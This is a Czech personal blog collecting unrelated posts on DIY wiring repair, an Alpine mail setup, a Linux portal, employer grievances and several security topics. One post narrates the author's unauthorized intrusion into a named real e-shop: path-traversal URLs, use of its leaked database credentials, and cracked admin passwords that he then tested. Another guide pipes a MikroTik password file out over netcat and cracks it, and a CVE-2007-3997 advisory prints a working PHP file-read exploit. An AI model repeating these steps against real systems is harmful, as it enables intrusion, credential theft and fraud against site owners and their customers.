Neustále se povalující klíče od auta, motorky či bytu mě občasně doháněli k šílenství. V inkriminovaný den jsem se tedy rozhodl navštívit hypermarket Globus, kde jsem zakoupil 2 kusy univerzálních držáků. V místě mého bydliště jsem na pokyn výrobce začal vrtačkou do zdi vytvářet díry o předem danné rozteči a průměru. K mé velké smůle jsem však již při hloubení druhé díry ve zdi přeťal kabel elektrického vedení. Nenechal jsem se ovlivnit hlasitým výbojem, sršením jističů ani nadávkami z kuchyně, že dnes bude zase studená večeře a pokračoval ve vrtání třetí díry. Tím pádem se mi během několika málo vteřin podařilo vybavit nejenom všechny jističe v mé bytové jednotce, ale i ten na chodbě. Bylo mi jasné, že nyní již budu muset neodkladně provést opravu.

Co budeme potřebovat?

Abychom neustále nependlovali mezi rozmláceným bytem, baumaxem, globusem, obi a hornbachem, je vhodné si dopředu nejprve ujasnit, které nářadí a pomůcky budeme potřebovat. Vše je patrné na následující fotce:

Potřebné nářadí

Nejdůležitějším vybavením pro obnažení zdiva je středně velký majzlík a kladívko. Pokud jste stejně jako já svině líné, pak si kupte místo toho pořádné bourací kladivo. Můj 7 kilový brouček se jménem Ferm Power Hammer dokáže díky úderu o síle 7J vybourat v panelu díru pro dveře během pár chvil. Důležité je ale předem upozornit místní seismologickou stanici, že budete pracovat. V opačném připadě by se jim mohli zbláznit přístroje. Po odkrájení přebytečného zdiva využijete především štípačky, kterými odstraníte původní “překouslé” vedení. Ostrý nůž následně hravě odstraní přebytečnou bužírku z vodičů a pro jejich spojení použijete speciální elektrikářské dutinky s izolací a lepidlem. Montáž dutinek bohužel vyžaduje speciální kleště a horkovzdušnou pistoli. Na né příliš dobře zatěsněná místa je vhodné použít vulkanizační pásku. Ve finále nezapomeňte koupit pytlík sádry a špachtli.

3-2-1 Opravujem

Před zahájením bouracích prací je vhodné vypnout všechny jističe, zkontrolovat tloušťku zdiva (jinak je možné, že se dostanete až k sousedovi do koupelny) a rozkrelit postup prací.

Lokalizace problému

Zdivo vybouráme 5 centimetrů vlevo i vpravo podél celého kabelu. Od místa přerušení pak minimálně 10cm směrem nahoru i dolů (já jsem kabel zároveň převrtal na dvou místech, takže jsem byl nucen vysekat větší kus). V okamžiku kdy je kabel volný, přestřihneme ho štípacími kleštěmi a odstraníme vadné (převrtané části).

Přeštípnutí kabelu

Odstranění přebytečného kabelu

Zbylý kabel je potřeba cca 4mm od konce odizolovat.

Odizolovaný kabel

Mezi konce kabelů vložíme spojovací dutinku. Ta po stisku speciálních kleští vytvoří pevné a nerozebíratelné spojení. Po zalisování stačí dutinku zahřát horkovzdušnou pistolí. Tím dojde k rozpuštění lepidla a smrštění vnější izolace. Spojení je pak 100%.

Spojovací dutinka

V mé výbavě jsem bohužel nenašel lisovací kleště se správným průměrem na dutinku. Na místo nich jsem použil klešte pro lisování konektorů BNC. Ty ovšem mají ostrá hrany a tak poruší vnější izolaci dutinky. Tento problém jsem vyřešil tak, že přes každou dutinku jsem přetáhl ještě jednu speciální smršťovací bužírku s velmi vysokou elektrickou pevností.

Zesílená izolace - před smrštěním

Zesílená izolace - po smrštění

Celou instalaci je více než vhodné ve finále opět zaizolovat. Já jsem použil smrtovací bužírky v kratší (horní) části spoje a vulkanizační pásky v delší (dolní) části spoje.

Finální izolace

Výsledek našeho půlhodinového snažení zasádrujeme (uděláme omítku).

Příprava sádry

Před omítnutím

Závěr

Celý úkon trval sotva hodinku a IMHO vypadá mnohem lépe než dvě spojovací krabice (jak mi radili někteří Inženýři….). Pro zvědavce uvádím, že dutinky stojí 9Kč/Kus, sádra 12 Korun, takže i finančně se to dá zvládnout.

Na co si dát příště bacha

Na kočky… Při chvíli přemýšlení jsem zpozoroval divný zvuk, který vycházel z útrob kufru od bouracího kladiva. Po jeho otevření mi vše bylo jasné.

Bambína zase chrní

Pine jsem používal před několika lety společně s fetchmailem. To už by byl dnes problém, neboť potřebuji mít k poště mobilní přístup odkudkoliv (můj mail box čítá více jak 10 000 emailů) a tak jsem začal pátrat, zda-li existuje možnost používat nativně IMAP. Naštěstí existuje!

První co bylo potřeba udělat je vyměnit starý a dnes již nevyvíjený Pine za Alpine. Jako betatester mi posloužil Ivan Bíbr - více na jeho blogu. Ovládání i konfigurační soubory jsou naštěstí stejné, takže mi nečinilo problém Alpine naohýbat k obrazu svému. Dále jsem pokračoval úpravou konfiguračního souboru .pinerc v domovském adresáři.

$ vi ~/.pinerc

V souboru .pinerc jsem upravil konfigurační volby “smtp-server“, “inbox-path” a “feature-list” na následující:

Pozn.: Jednotlivé volby je samozřejmě možné “naklikat” přes menu Alpine, ale takhle mi to přijde jednodušší.

smtp-server=smtp.example.com
inbox-path={mail.example.com/user=test@test.com/ssl/novalidate-cert}INBOX
feature-list=enable-incoming-folders

Ve výše uvedeném příkladu jsem předpokládal, že:
SMTP server je: smtp.example.com
IMAP server je: mail.example.com
Přihlašovací jméno je: test@test.com
K serveru se připojujeme pomocí SSL via self-signed certifikát

Protože Alpine defaultně pracuje s lokálně uloženými složkami, bylo potřeba ho ještě naučit pracovat přímo s IMAPem. postup je velice jednoduchý:

$ alpine
Zmáčkneme S (Setup)
Zmáčkneme L (collectionLists)
Zmáčkneme A (Add Client)

Vyplníme:
Nickname : IMAP složky
Server : mail.example.com/user=test@test.com/ssl/novalidate-cert
Path : INBOX.
View :

Nakonec zmáčkneme klávesu CTRl+x pro uložení změn

Tak a je hotovo - můžu používat IMAP!

Ještě máme v záloze nějaké starší články, které jsou nadčasové (kancelář apod.), ale už od listopadu intenzivně vydáváme články nové, což se pozitivně promítlo na návštěvnosti. Minimálně od září “jdeme nahoru” - navštěvuje nás stále víc lidí a vracejí se k nám.

Jirka Vrba vydává pravidelné měsíční reporty, kde se lze dočíst, co čtenáře zajímá. Je to pro nás vodítko, řídíme se jím při přípravě nových článků.

Bohužel se mi stává, že se mi ozvou lidi se slovy “škoda, že jste skončili a na webu vycházejí jen staré články”. Nevím, jestli se mám smát, nebo nesmát. Půl roku intenzivní práce a někdo si ani nedá práci, aby nacvakal adresu www.linuxexpres.cz. Ale zřejmě to je to naše (moje) chyba, není o nás prostě slyšet. Takže to chci změnit.

LinuxEXPRES žije!

A žije bohatým životem. Vydáváme články pro server Živě, čímž se snažíme dostat Linux k lidem, kteří sledují obecný trend v IT a o Linuxu by si rádi něco přečetli. Některé diskuze jsou “živěé”, ale asi je to dobře.

Portál LinuxEXPRES.cz prošel oživovací kúrou - vylepšili jsme design, vymysleli jsme nové rubriky, přinášíme nové články:

• Dva týdny s Linuxem je pravidelný “novinkový” seriál Jirky Eischmanna, právě tenhle vychází na zmiňovaném Živě.cz.
• Jirka Němec ze serveru LinuxGames.cz pro nás připravuje pravidelný měsíční přehled o novinkách v linuxových hrách a hříčkách. Jirka se v oboru vyzná, ostatně proto jsme ho oslovili.
• “Příběhy ze života” Proč používá Linux zachycují příběhy uživatelů Linuxu. Jak se k němu dostali, proč si jej vybrali, k čemu a jak jej používají. Právě tady potřebujeme pomoc vás všech. Napište krátký text, kde ukážete, že Linux je zcela běžný moderní systém, který vám vyhovuje - byť má chyby. Příklady táhnou a mohou mít mnohem větší význam, než si můžete myslet.
• Další naší snahou je stát se službou pro lokální sdružení a seskupení, která konají různé akce. Jsme samozřejmě mediálním partnerem např. konference Linuxexpo (kam se letos chystám, abych udělal pár rozhovorů, máte se nač těšit, milí čtenáři LE ;-)), ale zajímají nás také “malé” věci. Proto jsme vytvořili interaktivní mapu (na titulce) a také stránky měst, “kde se něco děje”. Bohužel ne všechna uvedená města mají svůj obsah, a ne všechna města, kde se něco děje, jsou v mapě. Napište, prosím.Pokud pořádáte linuxovou akci, rádi vám vydáme tiskovku, sborník nebo reportáž. Nás to nic nestojí a vám to třeba pomůže. Také máme kalendář, kam můžete data akcí zadávat - zcela zdarma a bez nějakého omezení. Chceme podporovat i drobné akce, protože si myslíme, že mají smysl.

Nápadů máme stále hodně, v přípravě je mnoho článků, samozřejmě je nebudu prozrazovat, ale věřím, že budou zajímavé a čtivé.

Hodně čtenářů se v anketě vyjádřilo, že by poslali příspěvek na provoz portálu. Buď formou SMS, nebo přímo na účet. Rozjeli jsme to a tahle možnost je tedy k dispozici (diskuze v blogu). Příspěvky poslouží k bonusovému ohodnocení autorů a vytváření nového obsahu. Ony “se” ty nápady samy neudělají, bohužel.

Jak bych to shrnul? Těší nás statistický zájem, ale brzdí nás, že se lidi nevyjádří: nediskutují, nenadávají, nechválí, nepíšou do redakce, že chtějí ten a ten článek, moc neposílají esemesky. Co je blbě?

V.O. v.r.

P.S. Otvírejte v prohlížeči, který umí animované gify…

V tom lepším případě, by při nabourání obchodu “hackerem”, mohlo vyjít najevo, že si každý měsíc po výplatě objednáváte nějakou sprosťárničku v sexshopu. V horším případě útočník zjistí i heslo a bude si tak moct číst vaši soukromou poštu s přítelkyní/milenkou/manželkou neboť do emailu zadáváte stejné heslo jako do eshopu. Pokud chcete slyšet hororové scénáře, pak věřte, že není problém využít uložených informací o vaší kartě a objednat si tak jakékoliv zboží, které ve výsledku ovšem nezaplatí útočník, ale vy z vaší karty.

Stále si myslíte, že se vám to nemůže stát neboť nakupujete pouze v renomovaných a velkých eshopech? Chyba!

Před před více jak týdnem jsem zcela náhodou objevil na stránkách jednoho z největších českých prodejců outdoorového vybavení - firmy Rock point zcela zásadní (a naprosto školáckou) bezpečnostní chybu. Ihned jsem prodejce emailově kontaktoval a problém mu nastínil. Bohužel do dnešního dne jsem neobdržel odpověď a chyba je stále neopravená.

O co jde?

Při hledání dokumentace k jednomu z výrobků jsem narazil na následující odkaz:

http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls

Nebývá zrovna zvykem, že by prodejce uveřejňoval seznam svých odběratelů. To ve mě vyvolalo pocit, že tato stránka měla být před zraky zákazníků ukryta. Začal jsem přemýšlet, co by se stalo, kdybych zadal jako parametr jiný soubor než je seznam_odberatelu_NET.xls. Po chvíli jsem tedy do adresního řádku zadal následující adresu:

http://www.rockpoint.cz/download.php?soubor=soubory/../index.php

Při čemž “index.php” bývá “startovací stránkou” webu a řetězec “../” značí, že se jedná o nadřazený adresář.
To co se stalo mi téměř vyrazilo dech. Zobrazila se mi totiž opravdu zdrojová stránka souboru index.php. Opravdu bych nečekal, že u tak velkého prodejce narazím na tak kritickou chybu.

Ze zvědavosti jsem stejným způsobem procházel všechny ostatní soubory na serveru, až jsem došel k následujícímu:

http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php

Tento soubor (jak je již patrné z názvu) obsahuje data potřebná pro připojení k My SQL databázi.
Tím ovšem má zvědavost neskončila. Rozhodl jsem se výsledek ověřit.

V konfiguračním souboru je uveden jako My SQL host “uvdb4.globe.cz”. Vzdálený přístup k této databázi sice není povolen, ale to mě nemohlo odradit. Po chvíli hledání jsem zjistil, že se jedná o server, který je provozován v rámci hostingu Active 24. Na stejnojmenných stránkách jsem pak v sekci podpora našel odkaz k PHPMyAdminovi, který umožňuje spravovat My SQL databáze pomocí web prohlížeče. Kliknul jsem na link a zadal přihlašovací údaje. Nemohlo následovat nic jiného, než úspěšné přihlášení. Přede mnou byl kompletní seznam všech výrobků, uživatelů, objednávek a seznamů prodejen. V podstatě bych v této chvíli mohl eshop plně ovládnout, ale mě zajímala poslední neprozkoumaná věc - administrativní sekce obchodu.

Administrační sekci nebylo zase tak těžké najít. Kupodivu se nacházela na url:

http://www.rockpoint.cz/admin/

Nahlédl jsem zpět do tabulky administrátorů, abych zjistil přihlašovací jméno a heslo. Zde byla alespoň nějaká snaha o zabezpečení - heslo bylo zakódováno pomocí algoritmu MD5. Bohužel tento algoritmus je už dnes “překonaný”. Heslo prvního administrátora jsem tak “rozlouskl” díky jeho jednoduchosti přes jednu z online HASH databází. Heslo druhého administrátora bylo sice složitější, ovšem pod útokem rainbow tabulek bylo později prolomeno také. Oba účty jsem ještě otestoval - byly funkční. Tím má “práce” skončila.

Výše uvedený text nenabádá k zneužití popsané chyby. Text byl sepsán z důvodu laxního přístupu administrátorů danných stránek.

Tento příspěvek je chráněný heslem. Pokud jej chcete zobrazit, zadejte své heslo:

Heslo:

Tento příspěvek je chráněný heslem. Pokud jej chcete zobrazit, zadejte své heslo:

Heslo:

1. Zapojíme USB->COM redukci. U mě se redukce namapuje na ttyUSB0 - viz hláška z dmesg

[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0

2. Nainstalujeme TFTP server
# sudo apt-get install atftpd

3. Opravíme konfiguraci démona xinet přidáním parametru “-inetd_compat”
# sudo vi /etc/default/xinetd
XINETD_OPTS="-stayalive -inetd_compat"

4. Nahrajeme alternativní kernel s podporou yaffs2 do adresáře /tftpboot

5. Nainstalujeme DHCP server
# sudo apt-get install dhcp3-server

6. Nastavíme parametry DHCP serveru
# sudo vi /etc/dhcp3/dhcpd.conf
default-lease-time 21600;
max-lease-time 43200;
option domain-name-servers 10.0.0.1;
option netbios-name-servers 10.0.0.1;
option netbios-node-type 8;
option www-server 10.0.0.1;
authoritative;
allow booting;
allow bootp;

subnet 10.0.0.0 netmask 255.255.255.0
{
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
filename "/tftpboot/linuxrc";
range 10.0.0.10 10.0.0.100;
}

7. Nastavíme IP adresu na našem síťovém rozhraní, spustíme DHCP a TFTP server
sudo ifconfig eth0 down
sudo ifconfig eth0 10.0.0.1 up
sudo /etc/init.d/xinetd restart
sudo /etc/init.d/dhcp3-server start

8. Spustíme konfiguraci minicomu
# minimcom -s

Vybereme položku “Nastavení sériového portu” a nastavíme následující parametry:

A - Sériové zařízení : /dev/ttyUSB0
B - Umístění zámku : /var/lock
C - Program pro příchozí volání:
D - Program pro odchozí volání :
E - Bps/Par/Bity : 115200 8N1
F - Hardwarová kontrola toku : Ano
G - Softwarová kontrola toku : Ne

Připojíme kabel do Mikrotiku
Mělo by se zobrazit:
MikroTik 2.9.46
MikroTik Login:

Rebootujeme Mikrotik

Zobrazí se:
RouterBOOT booter 2.10
RouterBoard 532A
CPU frequency: 399 MHz
Memory size: 64 MB
Press any key within 2 seconds to enter setup.

Zmáčkneme libovolnou klávesu dříve, než vyprší interval.

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vyberme “o” pro volbu “boot device”.

Zobrazí se:
Select boot device:
e - boot over Ethernet
* n - boot from NAND, if fail then Ethernet
c - boot from CompactFlash only
1 - boot Ethernet once, then NAND
2 - boot Ethernet once, then CompactFlash
o - boot from NAND only
b - boot chosen device
your choice:

Vybereme “1″ pro boot z Ethernetu (a následně NAND)

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme “p” pro “boot protocol”.

Zobrazí se:
Choose which boot protocol to use:
1 - bootp protocol
* 2 - dhcp protocol
your choice:

Vybereme “2″ pro “dhcp” protocol”

Zobrazí se nám opět úvodní menu
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme “x” pro uložení a opuštění setupu. Mikrotik se znovu rebootuje.

Nyní by se měl načíst nový kernel - v mém případě z opravené distribuce OpenWrt
BusyBox v1.4.2 (2008-01-15 11:43:12 CET) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (7.09) -----------------------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@OpenWrt:/#

Vypíšeme si jednotlivé blokové zařízení
#cat /proc/mtd
dev: size erasesize name
mtd0: 00400000 00004000 "RouterBoard NAND Boot"
mtd1: 03c00000 00004000 "RouterBoard NAND Main"

Připojíme filesystém na kterém jsou uložena hesla
# mount -t yaffs2 -o ro /dev/mtdblock1 /mnt

Na PC si spustíme netcat s následujícími parametry
sudo /bin/netcat -l -p 666 > user.dat

Na mikrotiku zobrazíme soubor s hesly a přes netcat ho pošleme do PC
cat /mnt/nova/store/user.dat|nc 10.0.0.1 666

Na PX spustíme nástroj na lámání hesel
# ./mtpass user.dat
mtpass v0.2 - MikroTik RouterOS password recovery tool
Reading file user.dat, 213 bytes long
Rec# | Username | Password | Disable flag | User comment
--------------------------------------------------------------------------------------------
1 | admin | mojeheslo | | system default user

Návod vychází z informací na stránkách http://manio.skyboo.net/mikrotik/
Autor neručí za případné škody při použití tohoto návodu.

Jako každý správný Čech bych mohl začít nadávat na nový sazebník - na drahé výběry z bankomatu, poplatek za vklad v hotovosti, vysokou částku za schválení úvěru či na dalších milion věcí, které se mi nelíbí. Jenomže to není to, co mě dnes trápí.

Už nějaký ten pátek bydlím nedaleko jedné pobočky Ebanky, ve které shodou okolností začala před rokem a půl pracovat má přítelkyně. Zprvu jsem byl opravdu nadšený. Jako pracovnice “kóól centra” sice domů nenosila desetitisíce, ale já byl rád, že si rychle našla nějakou práci a že ji mám takříkajíc za rohem. Co mi na její práci vadilo nebyly občasné noční směny, ale spíše zodpovědnost a hlavně stres, který si sem-tam z práce donesla domů. Některé večery tak byly trošku vypjaté, ale postupem času se vždy atmosféra uklidnila a my se společně mohli některým pracovním problémům už jen smát.

Bohužel jak se brzy ukázalo, tato idylka nám netrvala dlouho. Šéfové Ebanky zřejmě oprášili přísloví “nové koště dobře mete” a tak začalo přibývat nočních směn a přesčasů. Výplatní pásku jsem doma nikdy přítelkyni nekontroloval, ale podle jejího výrazu v den výplaty a stále stejného počtu šminek (a dalších kosmetických přípravků v koupelně) si troufám tvrdit, že noční směny nabyly nějak závratně oceněny - jestli vůbec…

Skoro jsem si začal myslet, že naše nekonečné pracovní martyrium utichá, když se na veřejnosti objevila zpráva, že Rajfka skupuje Ebanku. Zprvu se v našem malém městečku nic nedělo a tak nebyl důvod podléhat panice. O to horší to však mělo spád později. Z doslechu vím, že na “kóólu” do poslední chvíle nikdo nevěděl, co se bude dít a zda-li nebude jeho místo zrušeno. Přítelkyně se ve vší prozíravosti nechala raději dopředu přeřadit na jiné místo. Nalákána byla na stálou pracovní dobu a minimum komunikace s klienty Ebanky. Pro ostatní nebyl konec nikterak slavný. Někteří z existenčních důvodů raději přešli na jinou pobočku (do jiného města), jiní byli přeřazeni a ti ostatní takříkajíc odešli s prázdnou.

Už jsem se těšil, jak náš život opět zapadne do těch starých a stereotypních kolejí. Bohužel mi to ale zase nevyšlo. Blížil se totiž čas vánočních svátků a pracovní doba mé přítelkyně se přes všechny sliby opět začala prodlužovat jako týden před výplatou. Poslední dny ve starém roce tak nestrávila úklidem domácnosti, zdobením stromečku či pečením cukroví, ale spíše jako nějaká programátorka za konzolí. Takto to pokračovalo až do 31.12., kdy odpoledne dostala konečně padla (a mě tak ubyla starost, jak se dostat do Ebanky, abych si se svou vlastní přítelkyní mohl alespoň na Silvestra dát pusu a připít šampaňského).

Nový rok v Ebance začal docela poklidně. Vedení zřejmě ještě vykazovalo známky intoxikace alkoholem, neboť přítelkyně dostala dokonce po více jak jednom roku týdenní dovolenou. Mohla si tedy užívat celých 7 dní bez klávesnice, monitoru a trvalého zvonění telefonu. Mně bylo zcela jasné, že její tělo není schopno tak velkou dávku relaxace zvládnout. Tuto skutečnost také potvrdil první den po dovolené obvodní lékař, který jí dal namísto obrázku či lízátka neschopenku do dalšího pondělí. Naštěstí pro nás má Ebanka vlastní “šamany”, kteří vás okamžitě dokáží nadzvednout z postele (a to doslova). Pro naši léčbu jim přišla jako nejlepší varianta změny prostředí, takže od začátku ledna svou přítelkyni postrádám a postrádat (nejdříve) do března budu, neboť je na služební cestě v 300km od domova.

Jako klient Ebanky jsem nespokojený již dlouho. Jako přítel zaměstnankyně Ebanky mě štve, jak s ní zacházejí. Desítky hodin přesčasů, žádná možnost vybrat si dovolenou, plat jako pro herce z ochotnického divadla a po tom všem vás klidně jako bonus pošlou na několik měsíců 300km od vašeho domova protože jste v daném místě (vetším městě) levná pracovní síla. Stále ještě přemýšlíte pro tuto společnost pracovat?

Vztahuje se k:
< = PHP 5.2.3
<= PHP 4.4.7

CVE:
CVE-2007-3997

Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.

Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.

Řešení:
1) Kompilovat MySQL klienta s parametrem “–disable-local-infile”
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem “mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);”
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) “set-variable=local-infile=0″.

Exploit:
function r($fp, &$buf, $len, &$err) {print fread($fp, $len);}
$m = new mysqli(’localhost’, ‘aaaa’, ”, ‘a’);
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler(”r”);
$m->query(”LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE a.a”);
$m->close();